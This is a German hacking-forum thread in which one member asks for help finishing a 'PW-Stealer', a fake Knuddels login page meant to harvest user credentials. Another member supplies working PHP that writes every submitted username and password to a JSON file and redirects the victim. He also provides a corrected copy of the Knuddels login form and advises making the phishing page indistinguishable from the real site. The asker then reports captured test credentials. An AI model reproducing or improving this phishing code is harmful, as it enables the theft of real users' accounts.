1. #1

    Registriert seit
    27.02.2017
    Beiträge
    39
    Thanked 2 Times in 2 Posts

    Beitrag PW-Stealer im Login (Hilfe)

    Hallo,

    Ich habe nun nen' Script gefunden (PW-Stealer), wenn man seine Benutzerdaten eingibt, werden die in einer .txt-Datei auf nen'
    FTP-Server gespeichert. Ich weiß, ziemlich alt und unsicher das ganze.. Und ich sitze schon ungelogen paar Stunden da dran um den PW-Stealer
    zum laufen zu bekommen. Es funktioniert aber nicht. Ordner im download: (PW-Stealer) das ganze was dort drin ist funktioniert. Aber nun möchte ich
    das ganze in den Ordner (PW-Stealer soll da rein) in der Index.html schreiben. Hab schon einiges ausprobiert bzw. versucht einiges zu löschen oder umzuschreiben.
    Aber es funktioniert nicht, der PW-Stealer greift dann nichts mehr ab.

    Kann sich wer das ganze mal bitte anschauen und mir das eventuell fertig schreiben? das es funktioniert. Für den einen der sich damit auskennt, sicherlich keine 10
    Minuten arbeit. Wäre mega nett von euch, wenn er mir das ganze dann hochladen und per PN zu kommen lässt das ganze oder hier im Thread veröffentlicht zum download. Wäre schön, wenn der originale Button von Knuddels sowie Textbox benutzt werden kann.

    Dankeschön für eure Aufmerksamkeit. :-)
    Angehängte Dateien Angehängte Dateien

  2. #2

    Registriert seit
    28.10.2011
    Beiträge
    625
    Thanked 279 Times in 168 Posts

    Standard AW: PW-Stealer im Login (Hilfe)

    A) Dein Redirect ist fail. Seit wann macht man das ganze als HTML-Tag? Du nutzt PHP, also nutze auch dementsprechende Methoden.

    B) Wie soll das Formular funktionieren, wenn nicht angewiesen wird, was mit dem Formular passiert?

    C) Warum iterierst durch die POST-Variablen? Nutze doch ein solides JSON, am besten sogar als Wrapper um das ganze dir später besser anzeigen und verarbeiten zu lassen:

    PHP-Code:
    <?php
        $file    
    'loggedinSave.txt';
        
    $url    'http://japanstiftung.co.de/';
        
        if(isset(
    $_POST['action'])) {
            
    // Wenn Datei nicht existiert
            
    if(!file_exists($file)) {
                
    $data = [];
                
            
    // Ansonsten hole alten Content
            
    } else {
                
    $content    file_get_contents($file);
                
    $data        json_decode($content);
            }
            
            
    // Neue Daten hinzufügen
            
    $data[] = $_POST;
            
            
    // speichern
            
    file_put_contents($filejson_encode($dataJSON_PRETTY_PRINT));
            
            
    // weiterleiten...
            
    header('Location: ' $url);
            exit();
        }
    ?>
    Und bezüglich des Formulares, solltest du auch weitere Angaben machen:
    • Das <form>-Tag ist komplett leer!
    • Die Eingabefelder (<input>) haben keinen Namen!


    Dementsprechend machst du von Zeile 2011 bis 2052 folgende Änderungen:
    HTML-Code:
    <!-- Setze POST-Request und die Target-PHP! >>>>>>>>>>>> --> <form method="post" action="login.php">
    	<label class="InputField__textinput___jLHnP  ">
    		<div class="Spacer__small___2TTCY"></div>
    		<div style="position: relative; overflow: visible; background-color: transparent; flex-grow: 0; flex-shrink: 0; width: 24px; height: 24px; opacity: 0.44; background-position: center center; background-repeat: no-repeat; background-image: url(&quot;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAYAAABXAvmHAAAABGdBTUEAALGPC/xhBQAAA1FJREFUaAXtmE1LMlEUx4+iWYSGUVKQughK6WUTlCC1CNqHLlpYG79IEn2AWrWRNq77BkGIFET7XqgWmVhtKrLQlDrPvRdG0oc7zniuDYEHZGacOef8f3Nmzr1zbcgM/rDZ/7B2Ib0LYHUFuxWwugKOTgio1WpQKBSgVCqJ8G63G8bGxsDpdKpPx9uoKnt+fsadnR1cXFzEoaEh3p7Fj+8vLS3h7u4uvry8qEon4oCqaEdHRzgzM1MXrYlv3s7OzuLx8bGqtKgE4PDwsOGON4tuPvb5fJjNZpVAkAGurq7Q7/e3vPPNEMFgEK+vr8kQJICvry9MJBKmxWswyWQSv7+/SRAkgJubG2Qdpm0A7nt7e0sCIA1k7MWtt0p2V00bb7M8BsVIABcXF5TcwpcagwTw/v5OBqDGIAEMDg6SAagxSABs4CIDkGNQWkCxWMTh4eG2uxAf0B4eHigSkFSB0dFRWF9fb7sKGxsbMDIy0ra/cCThM+enpyecn583XYW5uTnhS81PGsi05KwV4tTUlGGI6elpPD8/19xJWyUAXMHd3R2ura0hm/NLQRwOB8bjcczn8yTRP51t/ID2EDZ685H14OAATk5OxEcNP8s/ZqLRKKyursLy8jLYbLZGJ8KRcgBNS6VSgWq1Kg57enqgt7dXO6V02zEApSp1gpHaqE7cXzv15wGUrEq8vb2JF5a1RmBfWXB/fw+vr6/w8fEhKtHf3w8DAwMQCARgYmICwuGweLE9Hg+5Um0DlMtlyOVyouOcnp7C5eUlfH5+GhLkcrkgFApBJBKBWCwGbBUD+vr6DPn+d9HPnmpkn3UWzGQyuLCwIO33LImpcwwE9/f3kd0AIxIarjE1kJ2dneHKyoopcWZgeGyew4wZBkin0+j1ejsmXgNl7wru7e0ZZmgJwFceNjc30W63d1y8BsFGakylUshzt7KWANvb278mXAPQtltbW63066/MsTkNsmmAZQB8Ysg16Jm0Ao+Pjzg+Pm6ZeK0KXAPXIjPpSMw+F4EtOrE41hrXwLXITAqgcsorS270fz0tUgCjwa2+TgrAnjmrtdXz62mRfg/wuQ5bOq8HsXJncnJSOleSAlgp2Exu6SNkJoiV13YBrLz7PHe3AlZX4B+943iESeaVrgAAAABJRU5ErkJggg==&quot;); background-size: contain; border-style: none; display: flex;"></div>
    		<div class="Spacer__tiny___2Bplo"></div>
    		<!-- Setze "nickname" >>>>>>>>>>>> --> <input name="nickname" type="text" placeholder="Nutzername" class="InputField__input___3pAPo" aria-label="Nutzername" data-test-id="login-input-username">
    		<div class="Spacer__small___2TTCY"></div>
    	</label>
    	<div class="Spacer__tiny___2Bplo"></div>
    	<label class="InputField__textinput___jLHnP  ">
    		<div class="Spacer__small___2TTCY"></div>
    		<div style="position: relative; overflow: visible; background-color: transparent; flex-grow: 0; flex-shrink: 0; width: 24px; height: 24px; opacity: 0.44; background-position: center center; background-repeat: no-repeat; background-image: url(&quot;/static/k3/v1/images/icon-password@2x.93cb325e.png&quot;); background-size: contain; border-style: none; display: flex;"></div>
    		<div class="Spacer__tiny___2Bplo"></div>
    		<!-- Setze "password" >>>>>>>>>>>> --> <input type="password" name="password" placeholder="Passwort" class="InputField__input___3pAPo" aria-label="Passwort" data-test-id="login-input-password" value="">
    		<div role="none" style="position: relative; display: flex; flex-direction: column; flex-grow: 0; flex-shrink: 0; overflow: hidden; align-items: stretch; width: 32px; height: 32px; padding: 4px; cursor: pointer;">
    			<div style="position: relative; overflow: visible; background-color: transparent; flex-grow: 0; flex-shrink: 0; width: 24px; height: 24px; opacity: 0.33; background-position: center center; background-repeat: no-repeat; background-image: url(&quot;/static/k3/v1/images/icon-show.1e240a83.png&quot;); background-size: contain; border-style: none; display: flex;"></div>
    		</div>
    		<div class="Spacer__small___2TTCY"></div>
    	</label>
    	<div class="Spacer__tiny___2Bplo"></div>
    	<div role="none" style="position: relative; display: flex; flex-direction: column; flex-grow: 0; flex-shrink: 0; overflow: hidden; align-items: stretch;">
    		<div role="none" style="position: relative; display: flex; flex-direction: column; flex-grow: 0; flex-shrink: 0; overflow: hidden; align-items: stretch; cursor: pointer;">
    			<div style="background-repeat: no-repeat; align-items: center;" class="Column__Column___15nJn " data-test-id="login-forgot-password-button">
    				<div class="Spacer__tiny___2Bplo"></div>
    				<div style="position: relative; display: inline; flex-grow: 0; flex-shrink: 0; overflow: hidden; white-space: pre-wrap; overflow-wrap: break-word; font-family: Source Sans Pro, Comic Sans MS, sans-serif; color: rgba(255, 255, 255, 0.66); font-size: 12px; line-height: 16px; cursor: inherit;"><span>Server Status: <span style="color:green"><b>Online!</b></span></span></div>
    				<div class="Spacer__tiny___2Bplo"></div>
    			</div>
    		</div>
    	</div>
    	<div class="Spacer__tiny___2Bplo"></div>
    	<div class="Spacer__base___SmVhb"></div>
    	<div style="background-repeat: no-repeat; max-width: 100%;" class="Column__Column___15nJn " data-test-id="login-button-submit">
    		<div class="Spacer__tiny___2Bplo"></div>
    		<!-- Setze "action" >>>>>>>>>>>> --> <button name="action" class="Touchable__Touchable___3ndcT Button_styles__general___1zLHf Button_styles__primary___WLP23 Button_styles__normal___3vfMG Button_styles__onDark___2NJmr" type="submit">
    			<div style="background-repeat: no-repeat;" class="Row__Row___31u9c container__alignItemsCenter___3lyhB">
    				<div class="Spacer__auto___2VZ_B"></div>
    				<div class="Button_styles__text___xBklW ">Einloggen</div>
    				<div class="Spacer__auto___2VZ_B"></div>
    			</div>
    		</button>
    		<div class="Spacer__tiny___2Bplo"></div>
    	</div>
    </form>
    P.S. ungetestet - Außerdem glaube ich kaum, dass ein derartig schlechter Stealer anklang finden wird. Da wird sicher niemand so einfach hereinfallen, einfach weil das ganze so schlecht umgesetzt wurde, dass man direkt dies als Fake einstufen kann. Ein vernünftiger Stealer/Phisher sollte schon sehr nahe an Legimität sein; Es sollte nicht nur aussehen wie Knuddels, es sollte sich auch so anfühlen. Du musst dem Nutzer mit vollem Ernst vorgaukeln, dass dies was bringen würde. Und das erreichst du nicht, wenn du ein Teil der Seite von denen "kopierst" und dann in 0-8-15 eine Tabelle im 90er-Stil präsentierst, was zu dem viel zu quietschige Farben beinhaltet.

  3. The Following User Says Thank You to Bubble Gum For This Useful Post:

    sl33p (14.05.2019)

  4. #3

    Registriert seit
    27.02.2017
    Beiträge
    39
    Thanked 2 Times in 2 Posts

    Standard AW: PW-Stealer im Login (Hilfe)

    Erstmal vielen Dank! Das du dir die mühe gemacht hast. Und ich nehme dein Feedback auch zu Herzen. :-)

    Es hat auch alles super geklappt, bis auf.. das er die Sonderzeichen wie üäö usw. nicht erkennt wie hier:
    [
    {
    "nickname": "iop\u00fco\u00fc",
    "password": "op\u00fco+",
    "action": ""
    },
    {

  5. #4

    Registriert seit
    28.10.2011
    Beiträge
    625
    Thanked 279 Times in 168 Posts

    Standard AW: PW-Stealer im Login (Hilfe)

    das er die Sonderzeichen wie üäö usw. nicht erkennt wie hier:
    *palmface*

    https://de.wikipedia.org/wiki/JavaSc...bject_Notation
    https://www.json.org

    Nutze doch ein solides JSON, am besten sogar als Wrapper um das ganze dir später besser anzeigen und verarbeiten zu lassen:
    Man merkt, dass du noch nie mit irgendwelchen Sprachen in Berührung kamst. Der Bezug auf "später besser anzeigen und verarbeiten zu lassen" ist nicht, dass du die RAW-Datei öffnest und dort hereinschaust. P.S. Online JSON Viewer

  6. The Following 2 Users Say Thank You to Bubble Gum For This Useful Post:

    Initialize (27.04.2021), sl33p (15.05.2019)

Ähnliche Themen

  1. C# HTTPWebRequest Hilfe! IpBoard Login
    Von RaidPower im Forum .Net
    Antworten: 15
    Letzter Beitrag: 20.09.2013, 01:29
  2. [VB] Hilfe beim Login
    Von getsha im Forum Knuddels Programmierung
    Antworten: 0
    Letzter Beitrag: 19.03.2012, 07:27
  3. Fast Knuddels Login (PW-Stealer) OS
    Von Boone im Forum Showroom
    Antworten: 8
    Letzter Beitrag: 12.04.2011, 14:14
Diese Seite nutzt Cookies, um das Nutzererlebnis zu verbessern. Klicken Sie hier, um das Cookie-Tracking zu deaktivieren.